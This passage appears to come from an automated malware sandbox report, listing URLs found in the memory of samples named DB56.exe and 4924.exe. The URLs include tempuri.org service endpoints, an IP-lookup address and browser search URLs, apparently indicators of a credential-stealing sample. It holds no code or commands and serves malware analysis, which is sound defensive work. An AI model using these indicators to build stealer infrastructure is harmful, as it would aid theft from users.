                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631215292.0000000002C4B000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631282609.0000000002C53000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.626049960.0000000002E90000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: explorer.exe, 00000005.00000000.372654179.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403688528.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.389556354.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: 8CE5.exe.5.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeMz
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: DB56.exe, 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab4
                      Source: 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabP
                      Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
